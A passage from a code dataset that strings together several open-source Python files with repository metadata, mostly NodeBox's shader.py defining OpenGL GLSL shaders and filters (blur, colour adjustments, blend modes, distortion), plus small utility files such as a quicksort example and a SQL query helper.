description=get_column_doc(column), required=not (is_column_nullable(column))
)
@convert_sqlalchemy_type.register(JSONType)
def convert_json_type_to_string(type, column, registry=None):
return JSONString(
description=get_column_doc(column), required=not (is_column_nullable(column))
)
| 33.527919 | 86 | 0.738834 |
27c55aed7c8e479e0934e9a5c856b2274d2d7689 | 2,022 | py | Python | inquiry/inquiry.py | movermeyer/inquiry | f6ea435c302560ba19985b5d4ce2c97e2f321508 | [
"Apache-2.0"
] | null | null | null | inquiry/inquiry.py | movermeyer/inquiry | f6ea435c302560ba19985b5d4ce2c97e2f321508 | [
"Apache-2.0"
] | null | null | null | inquiry/inquiry.py | movermeyer/inquiry | f6ea435c302560ba19985b5d4ce2c97e2f321508 | [
"Apache-2.0"
] | null | null | null | import os
from .figure import Figure
from .navigator import Navigator
try:
from psycopg2.extensions import adapt
except ImportError:
def adapt(value):
raise EnvironmentError("No adapting method found.")
class Inquiry(object):
def __init__(self, figures=None, debug=None):
"""Debug will sort the sql statement for testing accuracy
"""
self.debug = ((str(os.getenv('DEBUG', 'FALSE')).upper()=='TRUE') or os.getenv('CI')) if debug is None else debug
self.figures = dict([(name, Figure(name, json)) for name, json in figures.items()]) if figures else {}
self.build()
def adapt(self, value, *extra_data):
"""Return the value adapted for sql
"""
return adapt(value)
def query(self, query):
"""Return the results of this query
"""
pass
def build(self):
"""Get all the figures
"""
pass
def format(self, key, value, *_):
"""Format the returned results as they are yielded
"""
return value
def adapter(self, *extra_data):
"""Return value to be passed when adapting with valideer
ie. `valideer.parse(schema).validate(user_args, adapt=__this__)`
"""
return True
def add_figure(self, name, json):
self.figures[name] = Figure(name, json)
def new(self, *args):
""":args and :kwargs are passed through the figure
"""
return Navigator(self, args)
def make(self, *args, **kwargs):
return Navigator(self)(*args, **kwargs)
def get(self, index):
index = index.lower()
if index in self.figures:
return self.figures.get(index)
elif (index+"s") in self.figures:
return self.figures.get(index+"s")
for key in self.figures:
if index in self.figures[key].alias or index+"s" in self.figures[key].alias:
return self.figures[key]
raise LookupError('No figure found for `'+index+'`')
| 29.735294 | 120 | 0.596934 |
3a2c88444eb6d125ed9c6eaec55c23f740397e51 | 63 | py | Python | recap_agr/__main__.py | MirkoLenz/ReCAP-Argument-Graph-Retrieval | 5ff0b637aebfa59783f70617ebf5e618ca95168c | [
"Apache-2.0"
] | null | null | null | recap_agr/__main__.py | MirkoLenz/ReCAP-Argument-Graph-Retrieval | 5ff0b637aebfa59783f70617ebf5e618ca95168c | [
"Apache-2.0"
] | null | null | null | recap_agr/__main__.py | MirkoLenz/ReCAP-Argument-Graph-Retrieval | 5ff0b637aebfa59783f70617ebf5e618ca95168c | [
"Apache-2.0"
] | 1 | 2021-11-06T10:17:38.000Z | 2021-11-06T10:17:38.000Z | if __name__ == "__main__":
from .app import run
run()
| 12.6 | 26 | 0.587302 |
320c61502e441727f75371975a065d5fb4d57188 | 309 | py | Python | cs231n/numpy/01_quicksort.py | urunimi/cs231n | 55ed1323e1044440d8be5277116bd5a76c19d4c3 | [
"Apache-2.0"
] | null | null | null | cs231n/numpy/01_quicksort.py | urunimi/cs231n | 55ed1323e1044440d8be5277116bd5a76c19d4c3 | [
"Apache-2.0"
] | null | null | null | cs231n/numpy/01_quicksort.py | urunimi/cs231n | 55ed1323e1044440d8be5277116bd5a76c19d4c3 | [
"Apache-2.0"
] | null | null | null | def quicksort(arr):
if len(arr) <= 1:
return arr
pivot = arr[len(arr) // 2]
left = [x for x in arr if x < pivot]
middle = [x for x in arr if x == pivot]
right = [x for x in arr if x > pivot]
return quicksort(left) + middle + quicksort(right)
print(quicksort([3,6,8,10,1,2,1])) | 30.9 | 54 | 0.576052 |
6ca13146a0ab6a4d419f6328cc6bb5ce59b8fd1e | 79 | py | Python | pages/components/divider/_colors.py | AnnMarieW/dmc-docs | 5db1790b61e85209b85adb75ccf6e7462d93f231 | [
"MIT"
] | null | null | null | pages/components/divider/_colors.py | AnnMarieW/dmc-docs | 5db1790b61e85209b85adb75ccf6e7462d93f231 | [
"MIT"
] | null | null | null | pages/components/divider/_colors.py | AnnMarieW/dmc-docs | 5db1790b61e85209b85adb75ccf6e7462d93f231 | [
"MIT"
] | null | null | null | import dash_mantine_components as dmc
component = dmc.Divider(color="violet")
| 19.75 | 39 | 0.810127 |
bedb15a081cb8d5880d1635f84e3aa80e18e6f95 | 59,842 | py | Python | graphics/shader.py | est/nodebox-gl | f1909a7a4ebc55c8ba254f92e25acb26e8cf1f1d | [
"BSD-3-Clause"
] | 1 | 2015-09-29T14:22:49.000Z | 2015-09-29T14:22:49.000Z | graphics/shader.py | est/nodebox-gl | f1909a7a4ebc55c8ba254f92e25acb26e8cf1f1d | [
"BSD-3-Clause"
] | 1 | 2015-09-29T14:23:35.000Z | 2015-09-30T02:33:13.000Z | graphics/shader.py | est/nodebox-gl | f1909a7a4ebc55c8ba254f92e25acb26e8cf1f1d | [
"BSD-3-Clause"
] | null | null | null | #=== SHADER ==========================================================================================
# Fragment shaders, filters, Frame Buffer Object (FBO)
# Authors: Tom De Smedt, Frederik De Bleser
# License: BSD (see LICENSE.txt for details).
# Copyright (c) 2008 City In A Bottle (cityinabottle.org)
# http://cityinabottle.org/nodebox
from pyglet.image import Texture, SolidColorImagePattern
from pyglet.gl import *
from geometry import lerp
from math import radians
#=====================================================================================================
pow2 = [2**n for n in range(20)] # [1, 2, 4, 8, 16, 32, 64, ...]
def ceil2(x):
""" Returns the nearest power of 2 that is higher than x, e.g. 700 => 1024.
"""
for y in pow2:
if y >= x: return y
def extent2(texture):
""" Returns the extent of the image data (0.0-1.0, 0.0-1.0) inside its texture owner.
Textures have a size power of 2 (512, 1024, ...), but the actual image can be smaller.
For example: a 400x250 image will be loaded in a 512x256 texture.
Its extent is (0.78, 0.98), the remainder of the texture is transparent.
"""
return (texture.tex_coords[3], texture.tex_coords[7])
def ratio2(texture1, texture2):
""" Returns the size ratio (0.0-1.0, 0.0-1.0) of two texture owners.
"""
return (
float(ceil2(texture1.width)) / ceil2(texture2.width),
float(ceil2(texture1.height)) / ceil2(texture2.height)
)
def find(f, seq):
""" Return first item in the sequence where f(item) == True.
"""
for item in seq:
if f(item): return item
def clamp(value, a, b):
""" Returns value clamped between a (minimum) and b (maximum).
"""
return max(a, min(value, b))
#=====================================================================================================
#--- SHADER ------------------------------------------------------------------------------------------
# A shader is a pixel effect (motion blur, fog, glow) executed on the GPU.
# The effect has two distinct parts: a vertex shader and a fragment shader.
# The vertex shader retrieves the coordinates of the current pixel.
# The fragment shader manipulates the color of the current pixel.
# http://www.lighthouse3d.com/opengl/glsl/index.php?fragmentp
# Shaders are written in GLSL and expect their variables to be set from glUniform() calls.
# The Shader class compiles the source code and has an easy way to pass variables to GLSL.
# e.g. shader = Shader(fragment=open("colorize.frag").read())
# shader.set("color", vec4(1, 0.8, 1, 1))
# shader.push()
# image("box.png", 0, 0)
# shader.pop()
DEFAULT = "default"
DEFAULT_VERTEX_SHADER = '''
void main() {
gl_TexCoord[0] = gl_MultiTexCoord0;
gl_Position = ftransform();
}'''
DEFAULT_FRAGMENT_SHADER = '''
uniform sampler2D src;
void main() {
gl_FragColor = texture2D(src, gl_TexCoord[0].xy);
}'''
class vector(tuple):
pass
def vec2(f1, f2):
return vector((f1, f2))
def vec3(f1, f2, f3):
return vector((f1, f2, f3))
def vec4(f1, f2, f3, f4):
return vector((f1, f2, f3, f4))
COMPILE = "compile" # Error occurs during glCompileShader().
BUILD = "build" # Error occurs during glLinkProgram().
class ShaderError(Exception):
def __init__(self, value, type=COMPILE):
Exception.__init__(self, "%s error: %s" % (type, value))
self.value = value
self.type = type
class Shader(object):
def __init__(self, vertex=DEFAULT, fragment=DEFAULT):
""" A per-pixel shader effect (blur, fog, glow, ...) executed on the GPU.
Shader wraps a compiled GLSL program and facilitates passing parameters to it.
The fragment and vertex parameters contain the GLSL source code to execute.
Raises a ShaderError if the source fails to compile.
Once compiled, you can set uniform variables in the GLSL source with Shader.set().
"""
if vertex == DEFAULT:
vertex = DEFAULT_VERTEX_SHADER
if fragment == DEFAULT:
fragment = DEFAULT_FRAGMENT_SHADER
self._vertex = vertex # GLSL source for vertex shader.
self._fragment = fragment # GLSL source for fragment shader.
self._compiled = []
self._program = None
self._active = False
self.variables = {}
self._build()
def _compile(self, source, type=GL_VERTEX_SHADER):
# Compile the GLSL source code, either as GL_FRAGMENT_SHADER or GL_VERTEX_SHADER.
# If the source fails to compile, retrieve the error message and raise ShaderError.
# Store the compiled shader so we can delete it later on.
shader = glCreateShader(type)
status = c_int(-1)
glShaderSource(shader, 1, cast(pointer(c_char_p(source)), POINTER(POINTER(c_char))), None)
glCompileShader(shader)
glGetShaderiv(shader, GL_COMPILE_STATUS, byref(status))
if status.value == 0:
raise self._error(shader, type=COMPILE)
self._compiled.append(shader)
return shader
def _build(self):
# Each Shader has its own OpenGL rendering program and you need to switch between them.
# Compile fragment and vertex shaders and build the program.
program = glCreateProgram()
status = c_int(-1)
if self._vertex:
glAttachShader(program, self._compile(self._vertex, GL_VERTEX_SHADER))
if self._fragment:
glAttachShader(program, self._compile(self._fragment, GL_FRAGMENT_SHADER))
glLinkProgram(program)
glGetProgramiv(program, GL_LINK_STATUS, byref(status))
if status.value == 0:
raise self._error(program, type=BUILD)
self._program = program
def _error(self, obj, type=COMPILE):
# Get the info for the failed glCompileShader() or glLinkProgram(),
# delete the failed shader or program,
# return a ShaderError with the error message.
f1 = type==COMPILE and glGetShaderiv or glGetProgramiv
f2 = type==COMPILE and glGetShaderInfoLog or glGetProgramInfoLog
f3 = type==COMPILE and glDeleteShader or glDeleteProgram
length = c_int(); f1(obj, GL_INFO_LOG_LENGTH, byref(length))
msg = ""
if length.value > 0:
msg = create_string_buffer(length.value); f2(obj, length, byref(length), msg)
msg = msg.value
f3(obj)
return ShaderError(msg, type)
def get(self, name):
""" Returns the value of the variable with the given name.
"""
return self.variables[name]
def set(self, name, value):
""" Set the value of the variable with the given name in the GLSL source script.
Supported variable types are: vec2(), vec3(), vec4(), single int/float, list of int/float.
Variables will be initialized when Shader.push() is called (i.e. glUseProgram).
"""
self.variables[name] = value
if self._active:
self._set(name, value)
def _set(self, name, value):
address = glGetUniformLocation(self._program, name)
# A vector with 2, 3 or 4 floats representing vec2, vec3 or vec4.
if isinstance(value, vector):
if len(value) == 2:
glUniform2f(address, value[0], value[1])
elif len(value) == 3:
glUniform3f(address, value[0], value[1], value[2])
elif len(value) == 4:
glUniform4f(address, value[0], value[1], value[2], value[3])
# A list representing an array of ints or floats.
elif isinstance(value, (list, tuple)):
if find(lambda v: isinstance(v, float), value):
array = c_float * len(value)
glUniform1fv(address, len(value), array(*value))
else:
array = c_int * len(value)
glUniform1iv(address, len(value), array(*value))
# Single float value.
elif isinstance(value, float):
glUniform1f(address, value)
# Single int value or named texture.
elif isinstance(value, int):
glUniform1i(address, value)
else:
ShaderError, "don't know how to handle variable %s" % value.__class__
def push(self):
""" Installs the program and sets its variables.
When you use the image() command between shader.push() and shader.pop(),
the shader's effect will be applied to the image before drawing it.
To use shader effects in combination with paths,
draw the path in an offscreen buffer, render it, and apply to effect to the render.
"""
self._active = True
glUseProgram(self._program)
for k, v in self.variables.items():
self._set(k, v)
def pop(self):
# Note that shaders can't be nested since they all have their own program,
# pop() just removes any active program.
if self._active == True:
glUseProgram(0)
self._active = False
@property
def active(self):
return self._active
@property
def source(self):
return (self._vertex, self._fragment)
def __del__(self):
try:
for shader in self._compiled:
if glDetachShader and self._program:
glDetachShader(self._program, shader)
if glDeleteShader:
glDeleteShader(shader)
if glDeleteProgram:
glDeleteProgram(self._program)
except:
pass
class ShaderFacade:
def __init__(self, vertex=None, fragment=None):
# Acts like a shader but doesn't do anything.
pass
@property
def variables(self):
return {}
@property
def active(self):
return None
def get(self, name):
return None
def set(self, name, value):
pass
def push(self):
pass
def pop(self):
pass
SUPPORTED = True # Graphics hardware supports shaders?
def shader(vertex=DEFAULT_VERTEX_SHADER, fragment=DEFAULT_FRAGMENT_SHADER, silent=True):
""" Returns a compiled Shader from the given GLSL source code.
With silent=True, never raises an error but instead returns a ShaderFacade.
During startup, a number of Shaders are created.
This mechanisms ensures that the module doesn't crash while doing this,
instead the shader simply won't have any visible effect and SUPPORTED will be False.
"""
if not silent:
return Shader(vertex, fragment)
try:
return Shader(vertex, fragment)
except Exception, e:
SUPPORTED = False
return ShaderFacade()
#=====================================================================================================
#--- FILTER ------------------------------------------------------------------------------------------
# Stores a shader's variables and applies them once push() is called.
# The shader is created only once for perfomance while filters can exist multiple times.
# Textures that are drawn between Filter.push() and Filter.pop() have the effect applied to them.
class Filter(object):
def __init__(self):
""" Filter combines a Shader with variable settings.
Variables need to be prepared in Filter.push() before passing them to the shader:
e.g. creating a list of kernel values, calculating a scale based on image height, ...
Performance note: create the Shader separately, not during initialization.
"""
# Shader and its variables need to be stored here.
self.shader = None
self.texture = None
def push(self):
""" Installs the filter so it will be applied to the next image() call.
"""
# Shader needs to set its variables here:
# self.shader.set(variable, value)
self.shader.push()
def pop(self):
""" Removes the filter.
"""
self.shader.pop()
#=====================================================================================================
#--- INVERT -----------------------------------------------------------------------------------------
_invert = shader(fragment='''
uniform sampler2D src;
void main() {
gl_FragColor = texture2D(src, gl_TexCoord[0].xy);
gl_FragColor.rgb = 1.0 - gl_FragColor.rgb;
}''')
class Invert(Filter):
def __init__(self, texture):
self.shader = _invert
self.texture = texture
def push(self):
self.shader.push()
#--- GRADIENT ----------------------------------------------------------------------------------------
LINEAR = "linear"
RADIAL = "radial"
_gradient = {}
_gradient[LINEAR] = shader(fragment='''
uniform sampler2D src;
uniform vec4 clr1;
uniform vec4 clr2;
void main() {
vec2 v = gl_TexCoord[0].xy;
gl_FragColor = clr1 * v.y + clr2 * (1.0 - v.y);
}''')
_gradient[RADIAL] = shader(fragment='''
uniform sampler2D src;
uniform vec4 clr1;
uniform vec4 clr2;
void main() {
vec2 v = gl_TexCoord[0].xy - 0.5;
float d = 4.0 * (v.x * v.x + v.y * v.y);
gl_FragColor = clr1 * (1.0 - d) + clr2 * d;
}''')
class LinearGradient(Filter):
def __init__(self, texture, clr1=vec4(0,0,0,1), clr2=vec4(1,1,1,1)):
self.shader = _gradient[LINEAR]
self.texture = texture
self.clr1 = clr1
self.clr2 = clr2
def push(self):
self.shader.set("clr1", self.clr1)
self.shader.set("clr2", self.clr2)
self.shader.push()
class RadialGradient(Filter):
def __init__(self, texture, clr1=vec4(0,0,0,1), clr2=vec4(1,1,1,1)):
self.shader = _gradient[RADIAL]
self.texture = texture
self.clr1 = clr1
self.clr2 = clr2
def push(self):
self.shader.set("clr1", self.clr1)
self.shader.set("clr2", self.clr2)
self.shader.push()
#--- COLORIZE ---------------------------------------------------------------------------------------
_colorize = shader(fragment='''
uniform sampler2D src;
uniform vec4 color;
uniform vec4 bias;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
gl_FragColor = clamp(p * color + bias, 0.0, 1.0);
}''')
class Colorize(Filter):
def __init__(self, texture, color=vec4(1,1,1,1), bias=vec4(0,0,0,0)):
self.shader = _colorize
self.texture = texture
self.color = color
self.bias = bias
def push(self):
self.shader.set("color", self.color)
self.shader.set("bias", self.bias)
self.shader.push()
#--- COLORSPACE -------------------------------------------------------------------------------------
# Helper functions for conversion between RGB and HSB that we can use in other filters.
# Based on "Photoshop math with GLSL shaders" (2009), Romain Dura,
# http://blog.mouaif.org/?p=94
glsl_hsb2rgb = '''
float _hue2rgb(float a, float b, float hue) {
hue = mod(hue, 1.0);
if (6.0 * hue < 1.0) return a + (b - a) * 6.0 * hue;
if (2.0 * hue < 1.0) return b;
if (3.0 * hue < 2.0) return a + (b - a) * 6.0 * (2.0/3.0 - hue);
return a;
}
vec3 hsb2rgb(vec3 hsb) {
if (hsb.y == 0.0) return vec3(hsb.z);
float b = (hsb.z < 0.5)? hsb.z * (1.0 + hsb.y) : (hsb.y + hsb.z) - (hsb.y * hsb.z);
float a = 2.0 * hsb.z - b;
return vec3(
_hue2rgb(a, b, hsb.x + (1.0/3.0)),
_hue2rgb(a, b, hsb.x),
_hue2rgb(a, b, hsb.x - (1.0/3.0))
);
}'''
glsl_rgb2hsb = '''
vec3 rgb2hsb(vec3 rgb) {
vec3 hsb = vec3(0.0);
float a = min(min(rgb.r, rgb.g), rgb.b);
float b = max(max(rgb.r, rgb.g), rgb.b);
float c = b - a;
if (c != 0.0) {
vec3 d = ((vec3(b) - rgb) / 6.0 + c / 2.0) / c;
if (rgb.r == b) hsb.x = d.b - d.g;
else if (rgb.g == b) hsb.x = d.r - d.b + 1.0/3.0;
else if (rgb.b == b) hsb.x = d.g - d.r + 2.0/3.0;
hsb.x = mod(hsb.x, 1.0);
hsb.y = (hsb.z < 0.5)? c / (a+b) : c / (2.0 - c);
}
hsb.z = (a+b) / 2.0;
return hsb;
}''';
#--- ADJUSTMENTS ------------------------------------------------------------------------------------
BRIGHTNESS = "brightness"
CONTRAST = "contrast"
SATURATION = "saturation"
HUE = "hue"
_adjustment = {}
_adjustment[BRIGHTNESS] = shader(fragment='''
uniform sampler2D src;
uniform float m;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
gl_FragColor = vec4(clamp(p.rgb + m, 0.0, 1.0), p.a);
}''')
_adjustment[CONTRAST] = shader(fragment='''
uniform sampler2D src;
uniform float m;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
gl_FragColor = vec4(clamp((p.rgb - 0.5) * m + 0.5, 0.0, 1.0), p.a);
}''')
_adjustment[SATURATION] = shader(fragment='''
uniform sampler2D src;
uniform float m;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
float i = 0.3 * p.r + 0.59 * p.g + 0.11 * p.b;
gl_FragColor = vec4(
i * (1.0 - m) + p.r * m,
i * (1.0 - m) + p.g * m,
i * (1.0 - m) + p.b * m,
p.a
);
}''')
_adjustment[HUE] = shader(fragment=glsl_hsb2rgb+glsl_rgb2hsb+'''
uniform sampler2D src;
uniform float m;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
vec3 hsb = rgb2hsb(p.rgb);
hsb.x = hsb.x + m;
gl_FragColor = vec4(hsb2rgb(hsb).xyz, p.a);
}''')
class BrightnessAdjustment(Filter):
def __init__(self, texture, m=1.0):
self.shader = _adjustment[BRIGHTNESS]
self.texture = texture
self.m = m
def push(self):
self.shader.set("m", float(self.m-1))
self.shader.push()
class ContrastAdjustment(Filter):
def __init__(self, texture, m=1.0):
self.shader = _adjustment[CONTRAST]
self.texture = texture
self.m = m
def push(self):
self.shader.set("m", float(self.m))
self.shader.push()
class SaturationAdjustment(Filter):
def __init__(self, texture, m=1.0):
self.shader = _adjustment[SATURATION]
self.texture = texture
self.m = m
def push(self):
self.shader.set("m", float(max(self.m, 0)))
self.shader.push()
class HueAdjustment(Filter):
def __init__(self, texture, m=0.0):
self.shader = _adjustment[HUE]
self.texture = texture
self.m = m
def push(self):
self.shader.set("m", float(self.m));
self.shader.push()
#--- BRIGHTPASS --------------------------------------------------------------------------------------
# Note: the magic numbers 0.2125, 0.7154, 0.0721 represent how (in RGB)
# green contributes the most to luminosity while blue hardly contributes anything.
# Thus, luminance L = R*0.2125 + G*0.7154 + B+0.0721
_brightpass = shader(fragment='''
uniform sampler2D src;
uniform float threshold;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
float L = dot(p.rgb, vec3(0.2125, 0.7154, 0.0721)); // luminance
gl_FragColor = (L > threshold)? vec4(p.rgb, p.a) : vec4(0.0, 0.0, 0.0, p.a);
}''')
class BrightPass(Filter):
def __init__(self, texture, threshold=0.5):
self.shader = _brightpass
self.texture = texture
self.threshold = threshold
def push(self):
self.shader.set("threshold", float(self.threshold));
self.shader.push()
#--- BLUR --------------------------------------------------------------------------------------------
# Based on "Gaussian Blur Filter Shader" (2008),
# http://www.gamerendering.com/2008/10/11/gaussian-blur-filter-shader/
# Blurring occurs in two steps (requiring an FBO): horizontal blur and vertical blur.
# Separating these two steps reduces the problem to linear complexity (i.e. it is faster).
glsl_blur = '''
uniform sampler2D src;
uniform int kernel;
uniform float radius;
void main() {
vec2 v = gl_TexCoord[0].xy;
vec4 p = vec4(0.0);
float n = float(kernel * kernel);
for (int i=1; i<kernel; i++) {
float a = float(i) * radius;
float b = float(kernel - i) / n;
p += texture2D(src, vec2(v.x%s, v.y%s)) * b;
p += texture2D(src, vec2(v.x%s, v.y%s)) * b;
}
p += texture2D(src, vec2(v.x, v.y)) * float(kernel) / n;
gl_FragColor = p;
}'''
_blur = {
"horizontal": shader(fragment=glsl_blur % ("-a","","+a","")), # vary v.x
"vertical" : shader(fragment=glsl_blur % ("","-a","","+a")) # vary v.y
}
class HorizontalBlur(Filter):
def __init__(self, texture, kernel=9, scale=1.0):
self.shader = _blur["horizontal"]
self.texture = texture
self.kernel = kernel
self.scale = scale
def push(self):
self.shader.set("kernel", int(self.kernel));
self.shader.set("radius", float(self.scale) / self.texture.width)
self.shader.push()
class VerticalBlur(Filter):
def __init__(self, texture, kernel=9, scale=1.0):
self.shader = _blur["vertical"]
self.texture = texture
self.kernel = kernel
self.scale = scale
def push(self):
self.shader.set("kernel", int(self.kernel));
self.shader.set("radius", float(self.scale) / self.texture.height)
self.shader.push()
# It is useful to have a blur in a single pass as well,
# which we can use as a parameter for the image() command.
# However, for a simple 3x3 in separate steps => 6 calculations, single pass => 9 calculations.
_blur["gaussian3x3"] = shader(fragment='''
uniform sampler2D src;
uniform vec2 radius;
void main(void) {
float dx = radius.x;
float dy = radius.y;
vec2 v = gl_TexCoord[0].xy;
vec4 p = vec4(0.0);
p = 4.0 * texture2D(src, v);
p += 2.0 * texture2D(src, v + vec2(+dx, 0.0));
p += 2.0 * texture2D(src, v + vec2(-dx, 0.0));
p += 2.0 * texture2D(src, v + vec2(0.0, +dy));
p += 2.0 * texture2D(src, v + vec2(0.0, -dy));
p += 1.0 * texture2D(src, v + vec2(+dx, +dy));
p += 1.0 * texture2D(src, v + vec2(-dx, +dy));
p += 1.0 * texture2D(src, v + vec2(-dx, -dy));
p += 1.0 * texture2D(src, v + vec2(+dx, -dy));
gl_FragColor = p / 16.0;
}''')
class Gaussian3x3Blur(Filter):
def __init__(self, texture, scale=1.0):
self.shader = _blur["gaussian3x3"]
self.texture = texture
self.scale = scale
def push(self):
x = float(self.scale) / self.texture.width
y = float(self.scale) / self.texture.height
self.shader.set("radius", vec2(x, y))
self.shader.push()
#--- COMPOSITING -------------------------------------------------------------------------------------
# Compositing function.
# It will be reused in alpha compositing and blending filters below.
# It prepares pixels p1 and p2, which need to be mixed into vec4 p.
glsl_compositing = '''
uniform sampler2D src1;
uniform sampler2D src2;
uniform vec2 extent;
uniform vec2 offset;
uniform vec2 ratio;
uniform float alpha;
void main() {
vec2 v1 = gl_TexCoord[0].xy;
vec2 v2 = v1 * ratio - offset * extent;
vec4 p1 = texture2D(src1, v1.xy);
vec4 p2 = texture2D(src2, v2.xy);
if (v2.x < 0.0 ||
v2.y < 0.0 ||
v2.x > extent.x + 0.001 ||
v2.y > extent.y + 0.001) {
gl_FragColor = p1;
return;
}
vec4 p = vec4(0.0);
%s
gl_FragColor = p;
}'''
class Compositing(Filter):
def __init__(self, shader, texture, blend, alpha=1.0, dx=0, dy=0):
""" A filter that mixes a base image (the destination) with a blend image (the source).
Used to implement alpha compositing and blend modes.
- dx: the horizontal offset (in pixels) of the blend layer.
- dy: the vertical offset (in pixels) of the blend layer.
"""
self.shader = shader
self.texture = texture
self.blend = blend
self.alpha = alpha
self.dx = dx
self.dy = dy
def push(self):
w = float(self.blend.width)
h = float(self.blend.height)
w2 = float(ceil2(w))
h2 = float(ceil2(h))
dx = float(self.dx) / w
dy = float(self.dy) / h
glActiveTexture(GL_TEXTURE0)
glBindTexture(self.texture.target, self.texture.id)
glActiveTexture(GL_TEXTURE1)
glBindTexture(self.blend.target, self.blend.id)
glActiveTexture(GL_TEXTURE0)
self.shader.set("src1", 0)
self.shader.set("src2", 1)
self.shader.set("extent", vec2(w/w2, h/h2)) # Blend extent.
self.shader.set("offset", vec2(dx, dy)) # Blend offset.
self.shader.set("ratio", vec2(*ratio2(self.texture, self.blend))) # Image-blend proportion.
self.shader.set("alpha", self.alpha)
self.shader.push()
#--- ALPHA TRANSPARENCY ------------------------------------------------------------------------------
_alpha = {}
_alpha["transparency"] = shader(fragment='''
uniform sampler2D src;
uniform float alpha;
void main() {
vec4 p = texture2D(src, gl_TexCoord[0].xy);
gl_FragColor = vec4(p.rgb, p.a * alpha);
}''')
_alpha["mask"] = shader(fragment=glsl_compositing % '''
p = vec4(p1.rgb, p1.a * (p2.r * p2.a * alpha));
'''.strip())
class AlphaTransparency(Filter):
def __init__(self, texture, alpha=1.0):
self.shader = _alpha["transparency"]
self.texture = texture
self.alpha = alpha
def push(self):
self.shader.set("alpha", float(max(0, min(1, self.alpha))))
self.shader.push()
class AlphaMask(Compositing):
def __init__(self, texture, blend, alpha=1.0, dx=0, dy=0):
Compositing.__init__(self, _alpha["mask"], texture, blend, alpha, dx, dy)
self.shader = _alpha["mask"]
#--- BLEND MODES -------------------------------------------------------------------------------------
# Based on "Photoshop math with GLSL shaders" (2009), Romain Dura,
# http://blog.mouaif.org/?p=94
ADD = "add" # Pixels are added.
SUBTRACT = "subtract" # Pixels are subtracted.
LIGHTEN = "lighten" # Lightest value for each pixel.
DARKEN = "darken" # Darkest value for each pixel.
MULTIPLY = "multiply" # Pixels are multiplied, resulting in a darker image.
SCREEN = "screen" # Pixels are inverted/multiplied/inverted, resulting in a brighter picture.
OVERLAY = "overlay" # Combines multiply and screen: light parts become ligher, dark parts darker.
HARDLIGHT = "hardlight" # Same as overlay, but uses the blend instead of base image for luminance.
HUE = "hue" # Hue from the blend image, brightness and saturation from the base image.
# If the blend is opaque (alpha=1.0), swap base and blend.
# This way lighten, darken, multiply and screen appear the same as in Photoshop and Core Image.
_blendx = '''if (p2.a == 1.0) { vec4 p3=p1; p1=p2; p2=p3; }
'''
# Blending operates on RGB values, the A needs to be handled separately.
# Where both images are transparent, their transparency is blended.
# Where the base image is fully transparent, the blend image appears source over.
# There is a subtle transition at transparent edges, which makes the edges less jagged.
glsl_blend = glsl_compositing % '''
vec3 w = vec3(1.0); // white
%s
p = mix(p1, clamp(p, 0.0, 1.0), p2.a * alpha);
p = (v1.x * ratio.x > 1.0 || v1.y * ratio.y > 1.0)? p1 : p;
p = (p1.a < 0.25)? p * p1.a + p2 * (1.0-p1.a) : p;
'''.strip()
_blend = {}
_blend[ADD] = 'p = vec4(p1.rgb + p2.rgb, 1.0);'
_blend[SUBTRACT] = 'p = vec4(p1.rgb + p2.rgb - 1.0, 1.0);'
_blend[LIGHTEN] = _blendx + 'p = vec4(max(p1.rgb, p2.rgb), 1.0);'
_blend[DARKEN] = _blendx + 'p = vec4(min(p1.rgb, p2.rgb), 1.0);'
_blend[MULTIPLY] = _blendx + 'p = vec4(p1.rgb * p2.rgb, 1.0);'
_blend[SCREEN] = _blendx + 'p = vec4(w - (w - p1.rgb) * (w - p2.rgb), 1.0);'
_blend[OVERLAY] = '''
float L = dot(p1.rgb, vec3(0.2125, 0.7154, 0.0721)); // luminance
vec4 a = vec4(2.0 * p1.rgb * p2.rgb, 1.0);
vec4 b = vec4(w - 2.0 * (w - p1.rgb) * (w - p2.rgb), 1.0);
p = (L < 0.45)? a : (L > 0.55)? b : vec4(mix(a.rgb, b.rgb, (L - 0.45) * 10.0), 1.0);
'''
_blend[HARDLIGHT] = _blend[OVERLAY].replace("dot(p1", "dot(p2")
_blend[HUE] = '''
vec3 h1 = rgb2hsb(p1.rgb);
vec3 h2 = rgb2hsb(p2.rgb);
p = vec4(hsb2rgb(vec3(h2.x, h1.yz)).rgb, p1.a);
'''
for f in _blend.keys():
src = glsl_blend % _blend[f].strip()
src = f==HUE and glsl_rgb2hsb + glsl_hsb2rgb + src or src # Hue blend requires rgb2hsb() function.
_blend[f] = shader(fragment=src)
class Blend(Compositing):
def __init__(self, mode, texture, blend, alpha=1.0, dx=0, dy=0):
Compositing.__init__(self, _blend[mode], texture, blend, alpha, dx, dy)
#--- DISTORTION --------------------------------------------------------------------------------------
# Based on "PhotoBooth Demystified" (2007), Libero Spagnolini,
# http://dem.ocracy.org/libero/photobooth/
PINCH = "pinch" # Radius grows faster near the center of the effect.
TWIRL = "twirl" # Decreasing offset is added to the angle while moving down the radius.
SPLASH = "splash" # Light-tunnel effect by capping the radius.
BUMP = "bump" # Radius grows slower near the center of the effect.
DENT = "dent"
FISHEYE = "fisheye"
STRETCH = "stretch"
MIRROR = "mirror"
# Distortion function.
# - vec2 offset: horizontal and vertical offset from the image center (-0.5 to +0.5).
# - vec2 extent: the actual size of the image (0.0-1.0) in the texture.
# Textures have a size power of 2 (512, 1024, ...) but the actual image may be smaller.
# We need to know the extent of the image in the texture to calculate its center.
# - float ratio: the ratio between width and height, so the effect doesn't get stretched.
# - float m: the magnitude of the effect (e.g. radius, ...)
# - float i: the intensity of the effect (e.g. number of rotations, ...)
# - vec2 n: a normalized texture space between -1.0 and 1.0 (instead of 0.0-1.0).
glsl_distortion = '''
uniform sampler2D src;
uniform vec2 offset;
uniform vec2 extent;
uniform float ratio;
uniform float m;
uniform float i;
void main() {
vec2 v = gl_TexCoord[0].xy;
vec2 d = extent + extent * offset;
vec2 n = 2.0 * v - 1.0 * d;
n.x *= ratio;
%s
n.x /= ratio;
v = n / 2.0 + 0.5 * d;
%s
gl_FragColor = p;
}'''
# Polar coordinates.
# Most of the effects are based on simple angle and radius transformations.
# After the transformations, convert back to cartesian coordinates n.
glsl_polar = '''
float r = length(n);
float phi = atan(n.y, n.x);
%s
n = vec2(r*cos(phi), r*sin(phi));
'''.strip()
